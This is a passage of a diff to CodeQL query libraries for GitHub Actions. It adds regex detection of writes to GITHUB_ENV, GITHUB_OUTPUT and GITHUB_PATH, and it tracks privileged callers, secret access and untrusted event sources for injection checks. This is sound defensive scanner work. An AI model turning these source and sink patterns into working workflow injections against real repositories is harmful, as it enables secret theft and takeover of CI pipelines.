{ super.isPrivileged() } } /** @@ -273,6 +123,8 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } } class Input extends AstNode instanceof InputImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll new file mode 100644 index 000000000000..416cb97c8d08 --- /dev/null +++ b/ql/lib/codeql/actions/Helper.qll @@ -0,0 +1,209 @@ +private import codeql.actions.Ast +private import codeql.Locations + +bindingset[expr] +string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") + .regexpReplaceAll("\\s*\\.\\s*", ".") +} + +bindingset[regex] +string wrapRegexp(string regex) { + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] +} + +bindingset[str] +private string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") +} + +bindingset[line, var] +predicate extractLineAssignment(string line, string var, string key, string value) { + exists(string assignment | + // single line assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) + or + // workflow command assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) + ) +} + +bindingset[var] +private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV + result = + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +} + +bindingset[script, var] +predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) +} + +bindingset[line] +predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) +} + +predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) +} + +predicate writeToGitHubOutput(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +} + +predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) +} + +predicate inPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a privileged composite action + a = node.getEnclosingCompositeAction() and + ( + a.isPrivileged() + or + exists(Job caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + // node is in a privileged and externally triggereable job + j = node.getEnclosingJob() and + // job is privileged (write access or access to secrets) + j.isPrivileged() and + // job is triggereable by an external user + j.isExternallyTriggerable() + ) +} + +predicate inNonPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a non-privileged composite action + a = node.getEnclosingCompositeAction() and + not a.isPrivileged() and + not exists(LocalJob caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) +} + +predicate inNonPrivilegedJob(AstNode node) { + exists(Job j | + // node is in a non-privileged or not externally triggereable job + j = node.getEnclosingJob() and + ( + // job is non-privileged (no write access and no access to secrets) + not j.isPrivileged() + or + // job is triggereable by an external user + not j.isExternallyTriggerable() + ) + ) +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 46bbcaaf29ef..ebe2c70533d9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations -private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.Helper private import codeql.actions.dataflow.ExternalFlow /** @@ -299,6 +299,47 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().getValue() = name } + + LocalJobImpl getACaller() { + exists(LocalJobImpl caller, string gwf_path, string path | + // the workflow files may not be rooted in the parent directory of .github/workflows + // extract the offset so we can remove it from the action path + gwf_path = + caller + .getLocation() + .getFile() + .getRelativePath() + .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and + path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and + caller.getAStep().(UsesStepImpl).getCallee() = + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + result = caller + ) + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + this.getACaller().isPrivileged() + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -328,10 +369,10 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { string getName() { result = n.lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ - JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId } /** Gets a job within this workflow */ - JobImpl getAJob() { result = this.getJob(_) } + JobImpl getAJob() { result.getEnclosingWorkflow() = this } /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -368,6 +409,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().(YamlString).getValue() = name } + + ExternalJobImpl getACaller() { + result.getCallee() = this.getLocation().getFile().getRelativePath() + } } class RunsImpl extends AstNodeImpl, TRunsNode { @@ -649,12 +694,10 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; - YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and - runson = n.lookup("runs-on").(YamlMappingLikeNode) + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } override string toString() { result = "Job: " + jobId } @@ -765,14 +808,9 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, JobImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getEnclosingJob() and - caller.isPrivileged() - ) + // The Workflow is a Reusable Workflow only and there is + // a privileged caller workflow + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or // The Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 @@ -781,14 +819,15 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent().getName() = trigger and - count(this.getATriggerEvent()) = 1 - } - + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(ScalarValueImpl lbl | + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | ( lbl.getNode() = runson.getNode(_) and not lbl.getNode() = runson.getNode("group") @@ -960,14 +999,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - if u.getValue().matches("./%") - then result = u.getValue() - else + if u.getValue().indexOf("@") > 0 + then result = ( u.getValue().regexpCapture(usesParser(), 1) + "/" + u.getValue().regexpCapture(usesParser(), 2) ).toLowerCase() + else result = u.getValue() } /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ @@ -1061,27 +1100,26 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { - result = - Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } -private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } /** * Holds for an expression accesing the `secrets` context. @@ -1091,8 +1129,8 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1110,9 +1148,9 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1142,9 +1180,9 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and + normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -1175,9 +1213,9 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1200,8 +1238,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1225,8 +1263,8 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1251,8 +1289,8 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldAccess } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ba6430f157fc..1fe4a3e7e1c9 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -186,8 +186,8 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = super.getAJob() or - child = super.getStrategy() + child = super.getStrategy() or + child = super.getAJob() ) and l = child.getLocation() | @@ -242,7 +242,26 @@ private class JobTree extends StandardPreOrderTree instanceof LocalJob { } } -private class UsesTree extends StandardPreOrderTree instanceof Uses { +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d9f7b14edd3b..ca3e21e9d255 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -33,7 +33,7 @@ private predicate titleEvent(string context) { "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -46,7 +46,7 @@ private predicate urlEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -68,11 +68,9 @@ private predicate textEvent(string context) { "github\\.event\\.workflow_run\\.head_repository\\.description", // description "github\\.event\\.client_payload\\[[0-9]+\\]", // payload "github\\.event\\.client_payload", // payload - "github\\.event\\.inputs\\[[0-9]+\\]", // input - "github\\.event\\.inputs", // input ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -100,7 +98,7 @@ private predicate branchEvent(string context) { "github\\.event\\.merge_group\\.head_ref", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -114,7 +112,7 @@ private predicate labelEvent(string context) { "github\\.event\\.pull_request\\.head\\.label", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -134,7 +132,7 @@ private predicate emailEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -154,7 +152,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -168,7 +166,7 @@ private predicate pathEvent(string context) { "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -181,7 +179,7 @@ private predicate jsonEvent(string context) { "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.issue", "github\\.event\\.merge_group", "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", @@ -193,7 +191,7 @@ private predicate jsonEvent(string context) { "github\\.event\\.workflow_run\\.pull_requests", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -204,9 +202,9 @@ class GitHubSource extends RemoteFlowSource { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - Utils::normalizeExpr(context) = "github.head_ref" and + normalizeExpr(context) = "github.head_ref" and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } @@ -218,11 +216,18 @@ class GitHubEventSource extends RemoteFlowSource { string flag; GitHubEventSource() { - exists(Expression e, string context, string context_prefix | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + exists(e.getEnclosingCompositeAction()) + ) | titleEvent(context) and flag = "title" or @@ -258,11 +263,11 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + normalizeExpr(context).matches("%" + context_prefix + "%") ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") + normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") ) ) and flag = "json" @@ -283,17 +288,6 @@ class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } -/** - * An input for a Composite Action - */ -class CompositeActionInputSource extends RemoteFlowSource { - CompositeAction c; - - CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - - override string getSourceType() { result = "input" } -} - /** * A downloaded artifact. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cb391f2a2620..bbc40d56e2b4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -35,9 +35,9 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and ( - Utils::writeToGitHubEnv(run, _, value) or - Utils::writeToGitHubOutput(run, _, value) or - Utils::writeToGitHubPath(run, value) + writeToGitHubEnv(run, _, value) or + writeToGitHubOutput(run, _, value) or + writeToGitHubPath(run, value) ) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run.getScriptScalar() @@ -61,7 +61,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(varName) and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -72,7 +72,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: pred.asExpr() = run.getInScopeEnvVarExpr(varName) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -88,7 +88,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } @@ -100,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f63af3c10be4..b6b7cd539279 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -67,7 +67,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -91,7 +91,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else if this instanceof CompositeAction - then result = this.(CompositeAction).getLocation().getFile().getRelativePath() + then + result = + this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .prefix(this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(["/action.yml", "/action.yaml"])) else none() } } @@ -156,7 +166,10 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 681d6f1cfc39..87e8124db916 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -53,7 +53,8 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInput(pos) + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) } override string toString() { result = "input " + input.toString() } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 25de24032ba2..b17b4bc6b0d7 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -12,7 +12,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + 